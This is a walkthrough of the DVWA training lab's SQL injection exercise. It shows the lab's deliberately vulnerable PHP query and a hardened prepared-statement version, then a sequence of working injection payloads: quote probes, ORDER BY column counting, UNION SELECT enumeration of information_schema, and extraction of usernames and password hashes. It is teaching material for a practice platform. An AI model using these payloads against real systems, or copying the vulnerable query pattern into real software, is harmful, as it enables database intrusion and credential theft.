Code
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data: the id parameter is taken straight from the query string
    // with no validation or filtering (this is the deliberate flaw)
    $id = $_GET['id'];

    // $id is spliced directly into a quoted string literal in the SQL text
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

    // Any database error is echoed back to the page, which is what makes
    // the single-quote probe below so informative
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');

    $num = mysql_numrows($result);

    $i = 0;

    while ($i < $num) {
        $first = mysql_result($result, $i, "first_name");
        $last  = mysql_result($result, $i, "last_name");

        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';

        $i++;
    }
}
?>
The code performs no validation or filtering of the incoming id parameter, and because the value is placed inside single quotes in the query, the injection is of the string (character) type.
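For contrast, a hardened version of the same lookup. This is an added example, not DVWA's own code; it assumes an existing mysqli connection in a hypothetical variable $conn, and it closes the hole in three places: an integer check on id, a prepared statement with a bound parameter, and output encoding.

```php
<?php
// Hardened lookup (added example, not DVWA's code).
// Assumes a mysqli connection object in $conn (hypothetical).
if (isset($_GET['Submit'])) {
    $id = $_GET['id'];

    // 1. Validate: user_id is numeric, so anything containing a quote,
    //    a comment marker or SQL keywords is rejected before it reaches MySQL.
    if (!is_string($id) || !ctype_digit($id)) {
        http_response_code(400);
        exit('Invalid id');
    }

    // 2. Parameterise: the value is bound to a placeholder instead of being
    //    spliced into the SQL text, so quotes in the input have no meaning.
    $stmt = $conn->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = ?'
    );
    if ($stmt === false) {
        // Do not echo $conn->error to the client; log it server-side instead.
        error_log('prepare failed: ' . $conn->error);
        http_response_code(500);
        exit('Lookup failed');
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($first, $last);

    while ($stmt->fetch()) {
        // 3. Encode output so stored values cannot inject HTML into the page.
        echo '<pre>';
        echo 'ID: ' . htmlspecialchars($id, ENT_QUOTES, 'UTF-8')
           . '<br>First name: ' . htmlspecialchars($first, ENT_QUOTES, 'UTF-8')
           . '<br>Surname: ' . htmlspecialchars($last, ENT_QUOTES, 'UTF-8');
        echo '</pre>';
    }
    $stmt->close();
}
?>
```

With the integer check in place, every probe in the walkthrough below returns a 400 and never touches the database; the prepared statement is the second line of defence should a non-numeric column ever be looked up the same way.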
Submit 1: the query runs and returns a record
Submit a single quotation mark ('): the page shows a database error
Submit 1 and 1=1: the query runs and returns a record
Submit 1 and 1=2: the query still returns a record (the appended condition is inside the quotes and is treated as part of the string)
Submit 1' and '1'='1: the query runs and returns a record
Submit 1' and '1'='2: the query runs but returns nothing
This behaviour confirms a string-type injection.
Determine the number of columns in the query with ORDER BY
1' ORDER BY 1#: returns normally
1' ORDER BY 2#: returns normally
1' ORDER BY 3#: returns an error
So the query selects two columns
Find which columns are displayed on the page
1' UNION SELECT 1,2#
Check the database version and the name of the current database
1' UNION SELECT version(), database()#
The database version is 5.5.40 and the current database is named dvwa
List the tables in the current database
1' UNION SELECT 1, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()#
There are two tables: guestbook and users
List the columns of the users table
1' UNION SELECT 1, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name=0x7573657273#
NOTE: table_name is compared against the hex encoding of the string users (0x7573657273), which avoids putting another quoted string literal inside the injected query
Read the contents of the user and password columns
-1' UNION SELECT user, password FROM users#
DVWA platform v1.8 - SQL Injection